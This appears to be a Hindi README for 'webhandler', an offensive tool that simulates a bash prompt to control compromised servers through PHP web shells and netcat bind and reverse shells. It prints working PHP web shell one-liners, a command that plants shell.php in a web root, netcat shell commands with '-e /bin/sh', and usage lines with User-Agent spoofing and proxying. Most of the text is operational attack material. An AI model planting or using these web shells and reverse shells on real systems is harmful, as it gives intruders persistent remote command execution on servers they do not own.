
PHP सिस्टम फ़ंक्शन का उपयोग करके सर्वर को नियंत्रित करने के लिए Bash सिम्युलेटर।
PHP सिस्टम फ़ंक्शंस के लिए एक हैंडलर और 'netcat' हैंडलर का एक विकल्प भी
वेबहैंडलर 'लिनक्स बैश प्रॉम्प्ट' का अनुकरण करने का प्रयास करता है ताकि निम्नलिखित को संभाला और प्रोसेस किया जा सके:
- PHP प्रोग्राम निष्पादन फ़ंक्शन _(जैसे `system`, `passthru`, `exec`, आदि)_
- बाइंड शेल कनेक्शन
- रिवर्स शेल कनेक्शन
एक और विशेषता HTTP हेडर में "User-Agent" फ़ील्ड को स्पूफ करना है। (--random-angent)।
यह HTTP प्रॉक्सी भी सपोर्ट करता है (--proxy http://<ip>:<port>)
वेबहैंडलर POST और GET अनुरोधों के लिए काम करता है:
<?php system($_GET['cmd']); ?><?php passthru($_REQUEST['cmd']); ?><?php echo exec($_POST['cmd']); ?>वेबहैंडलर netcat कनेक्शनों का एक विकल्प है।
एक उदाहरण बाइंड कनेक्शन (जैसे nc -lvvp 1234 -e /bin/sh)
सामान्यतः उपयोगकर्ता यह करेगा:
netcat -l -p 1234nc -lvvp 1234एक उदाहरण रिवर्स कनेक्शन (जैसे nc 127.0.0.1 4321 -e /bin/sh)
सामान्यतः उपयोगकर्ता यह करेगा:
netcat -l -p 4321nc -lvvp 4321--Example फ़ाइल:
echo '<?php system($_GET['cmd']); ?>' > /var/www/shell.php--url एक आवश्यक आर्गुमेंट है जब GET या POST अनुरोध भेज रहे हों (जैसे एक बाइंड 'वेब आधारित PHP' कनेक्शन):
python webhandler.py --url http://www.mywebsite.com/shell.php?cmd=python webhandler.py --url http://www.mywebsite.com/shell.php --method POST --parameter cmdpython webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --random-agent --turbopython webhandler.py -u http://www.mywebsite.com/shell.php?cmd= --proxy http://127.0.0.1:8080--listen एक आवश्यक आर्गुमेंट है जब कनेक्शन की प्रतीक्षा कर रहे हों (जैसे एक रिवर्स 'रॉ' कनेक्शन):
python webhandler.py --listen 1234यदि आपके Python का संस्करण < 2.7.x है, तो argparse आवश्यक है
इसे इंस्टाल करने के लिए चलाएँ: sudo (apt-get|yum) install python-setuptools && sudo easy_install argparse या sudo pip --install argparse।
readline वैकल्पिक है। यह मॉड्यूल विस्तृत लाइन एडिटिंग और हिस्ट्री सुविधाएँ प्रदान करने के लिए उपयोग किया जाता है।
git वैकल्पिक है। यह प्रोजेक्ट को अद्यतन रखने की अनुमति देता है।
[विकी][]
[ज्ञात बग्स][]